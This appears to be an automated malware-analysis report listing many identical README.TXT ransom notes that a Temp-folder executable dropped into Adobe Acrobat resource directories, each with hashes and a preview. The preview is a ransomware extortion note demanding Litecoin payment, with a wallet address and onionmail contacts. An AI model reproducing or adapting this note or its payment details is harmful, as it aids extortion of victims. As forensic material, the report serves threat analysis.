                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\nb-no\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\nl-nl\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\pt-br\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\root\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\sv-se\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\plugins\rhp\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\images\themes\dark\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\fr-fr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\he-il\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\it-it\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\nb-no\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\nl-nl\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\pl-pl\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\pt-br\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\ro-ro\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
